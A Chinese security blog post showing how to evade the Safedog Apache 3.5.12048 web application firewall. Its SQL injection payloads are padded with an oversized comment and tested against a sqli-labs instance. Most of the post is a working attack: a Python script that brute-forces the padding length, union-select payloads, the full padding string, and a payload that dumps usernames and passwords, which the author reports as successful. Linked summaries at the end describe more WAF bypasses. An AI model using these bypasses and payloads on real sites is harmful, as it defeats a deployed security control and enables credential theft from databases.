SQL注入-安全狗apache3.5.12048版本超大数据包绕过

最新推荐文章于 2023-08-02 18:13:09 发布
最新推荐文章于 2023-08-02 18:13:09 发布
阅读量483 收藏 3
点赞数
分类专栏: 免杀和bypass 文章标签: 安全狗 bypass 过waf web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/117454678
版权

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

0x01 测试条件

  1. 这个是get请求的,要求对方可以接收post请求,也就是说对方应该是request

 

  1. 在发送请求的时候,要将bp的请求方式修改为post型

  1. 将安全狗的cc防攻击功能关闭

0x02 代码

# -*- encoding: utf-8 -*-
# Time : 2021/04/14 15:33:48
# Author: crow

import requests


'''
POST http://10.211.55.9/Less-1/ HTTP/1.1
Host: 10.211.55.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

id=-1'	 /**/union select 1,2,3 --+
'''



url = 'http://10.211.55.9/Less-1/'


data = "id=-1'	/**/ union select 1,2,3 --+"

headers = {
    # "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0",
    # 'Cookie': 'safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267'
  
    'Host': '10.211.55.9',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'DNT':'1',
    'Connection': 'close',
    # 'Content-Length': '135',
    'Cookie': 'safedog-flow-item=B997255C2337E9B4E56A9ECAB186C267',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '34',
}

# 4位的是从991开始就可以绕过


for  i in range(991, 992):
    m = '/*' +  str('crow') * i   +   '*/'
    # print(m)
    data = "id=-1'"	+ m + "union select 1,2,database() --+"
    res = requests.post(url, headers=headers, data=data).text
    # print(res.text)
    if 'qt-block-indent:0; text-indent' not in res:
        print('[+] current userful payload length:', i)
    else:
        print('{} not userful'.format(i))

截图:4位字母从991开始就可以绕过了

991基础版:

/*crowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrowcrow*/

0x03 手动测试

继续测试:

group_concat(concat_ws(0x7e,username,password)) from security.users --+

成功

关注微信可以获取该版本安全狗安装包

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!​​​​​​​

 

乌鸦安全
关注
专栏目录
neo4j-community-3.5.31-windows
03-27
在“neo4j-community-3.5.31-windows”这个压缩包中,包含的是 Neo4j 社区版的3.5.31版本,适用于Windows操作系统。这个版本是官方提供的免费版本,适合个人学习、开发和小型项目使用。 图形数据库与传统的关系型...
渗透测试SQL注入POST型的四种注入手法)、SQL注入绕过手段
Hi~ 土拨鼠
12-11 7779
文章目录使用BurpSuite进行post请求的抓包使用联合查询进行注入:使用报错注入进行注入:布尔盲注:时延查询:SQL注入绕过手段大小写字母绕过双写绕过编码绕过内联注释绕过 POST和GET的区别就是注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。当然可以借助对应的插件可以完成修改任务。 使用BurpSuite进行post请求的抓包 以Sqli-Lab Less11为例。 查看抓的包 将抓到的包发送到repeater模块,就可以进行重复测试了 初步判断sql语句大概为:select un
《这是知识点》之上传POST绕过Java过滤器
御前提笔小书童
01-30 581
项目场景: 提示:公司有个项目做安全测评时发现了一个注入问题。系统设置了全局的XSS过滤器,在其他功能点上生效了,但在一个发布功能没有被过滤,后续排查发现安全测评走的是上传包注入方式,故记录此次问题 问题描述: 问题功能模块的作用是一个添加相关参数并上传附件的点,问题出在添加的参数未被全局XSS过滤器生效 原因分析: 基于Tomcat和Spring MVC的底层代码分析问题原因 常用的请求分文三种,GET型请求,普通POST型请求和上传POST型请求。本文的普通型POST请求指的是除上传POS
2-6 【实验】13-POST00截断绕过+代码审计
山兔的博客
03-26 1472
这节课,我们要讲pass-12,pass-12和pass-11其实,没有什么本质的区别,只不过利用的方式稍微有点变化,我们先做下实验,做上传的木马文件进行拦截 我们看到包里面的内容,跟上节课参数有点一样,这里有个参数叫save_path,它的值…/upload/跟上节课是一样的,只不过上节课,它的类型是get类型,这个参数类型是post类型,我们按照上节课的思路做一下,我们加个%00,右键repeater,然后,我们在前面加个1a.php,后面yijuhua.php,改成jpg,我们点go 这个时候,他
安全狗3.5版本SQL注入绕过
恢弘志士的博客
07-19 441
环境搭建: phpstudy+sqli-labs-master 安全狗版本: 出现问题:新版安全狗Apache服务无法启动问题 管理员模式启动cmd,进入phpstudy部署目录phpstudy_pro\Extensions\Apache2.4.39\bin下 执行命令:httpd -k install -n apache2.4 环境搭建完毕,验证安全狗正常拦截开搞开搞!!! 从上面验证看来就是针对union 和select的组合进行拦截 按照B站小迪师傅搞了半天不行,想想应该是.
安全狗V3.512048版本绕过
最新发布
m0_66299232的博客
08-02 1278
全狗 safedogwzApacheV3.5.exe 右键电脑右下角安全狗图标-->选择插件-->安装插件 以管理员身份运行cmd安装apache服务 httpd -k install -n apache2.4 将服务写上,安装成功之后,注意不要选择在线安装服务器安全狗,安装之后会显示启动web服务失败,这里将phpstudy重启即可 使用恶意的参数进行测试下,安全狗生效 http://192.168.126.137/sqli-lab/Less-1/?id=1' union select 1,2,3 --
网站安全狗IIS枸杞2版 v3.5.11497
12-06
网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖网马/木马扫描、防SQL注入、防盗链、防黑链、防CC攻击、下载线程保护、IP黑白名单管理、实时流量监控、实时CPU...
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
sql-map-2.dtd和sql-map-config-2.dtd
06-10
总结来说,"sql-map-2.dtd"和"sql-map-config-2.dtd"是Ibatis 2.x版本中非常关键的组件,它们为XML配置文件提供了结构化规则,使得开发人员能够编写出合法且易于维护的SQL映射文件和全局配置文件。理解并正确使用...
渗透测试】利用分块传输绕安全狗
weixin_43954843的博客
08-06 34
1、环境搭建: 2、分块传输测试 3、插件 3.1BurpSuite插件 3.2 Sqlmap 1、环境搭建: DVWA+phpstudy+网站安全狗。 直接安装安全狗可能会遇到找不到apache服务的情况; 先停止apache,再安装apache服务: 安装完安全狗时输入刚注册服务时的apache2.4 下面的样子就是安装成功了。 拿dvwa的sqli模块进行...
Python爬虫讲座初探
abc8350712的博客
01-24 637
import requests cookies={} raw_cookies='ASP.NET_SessionId=nhuk5l55y0dbxj2p4ud032ui;safedog-flow-item=27238BB48846C959582F6E52555A6CCA' for line in raw_cookies.split(';'): key,value=line.split('='
Python 下载文件
Elag的专栏
05-31 1895
import urllib.request urllib.request.urlretrieve('http://...hxbl.rar','hxbl.rar')
mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30467861的博客
01-28 794
本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者:whynot 转自:先知0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有...
堆叠注入,waf绕过 安全狗为主(18)
san3144393495的博客
05-06 341
讲这个例子,堆叠注入他的一个用处,注入的时候需要获取到管理员的账户密码,但密码是加密的,加密经常揭秘不出来,很正常,可以利用这个注入实现堆叠注入,就是插入数据,诸如的时候向管理员这个表里面插入一个数据,成功的给管理员添加一个新用户,之后在用插入的用户名密码去登陆,就不需要考虑密码解不出来。基本上一些常见漏洞都检测,他的检测是插件的那种方法,每次更新也都是更新的插件,他会对还会对工具检测的一些常见的工具,nmap,菜刀,sqlmap,和xxs漏洞检测等基本上的都会检测,默认的检测项目是url。
文件上传绕过安全狗V3.5---绕过WAF---uploadlabs
z2560088的博客
01-16 2323
目录 环境: 测试: 1.数据溢出-防匹配 参数;saldmsakdsaxxsadsa(垃圾数据);参数 2.符号变异-防匹配 1 "Getzwt.php:"文件名后加: 2 filename========"Getzwt.php"​ 3.破坏数据包的完整性 1 去除formdata 2 去除content-type参数 4 重复数据-防匹配 1 filename=;filename="Getzwt.php" 参数之间以;分隔,让waf认为filename=null从而绕...
SQL注入 安全狗apache3.5.12048版本绕过
crowsec
01-26 1243
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.04.28 前言 没错,这次我们又来了,还是那条狗,绕过的是安全狗apache3.5.12048版本,个人感觉这个狗比上次的那个有难度些。上次发的文章里面没安全狗的文件,因为当时安装之后文件就删了,这次有,后台回复关键字: 安全狗3.5 获取 目前我们已经发布关于sql注入的文章和教学: 2019.11.20 更新sqli-labs 全部视频更新完成 SQL注入-安全狗超大数据包绕过 SQL...
SQL注入绕过安全狗的五种方法
01-11 1357
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
突破安全狗
duan_qiao925的博客
06-05 846
实验准备 Sql注入原理:用户能控制输入并构造恶意参数(多为sql语句),Web应用执行的代码拼接了未加过滤的nei'rong。
安全狗Apache v4.0.23137 SQL注入绕过技术分析
"SQL注入漏洞是网络安全中的一个严重问题,针对特定的安全狗apache主程序版本v4.0.23137存在绕过方法。本文档详细介绍了两种不同的SQL注入攻击技术及其应用示例,旨在帮助理解这类漏洞的利用方式,并提供防御建议。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值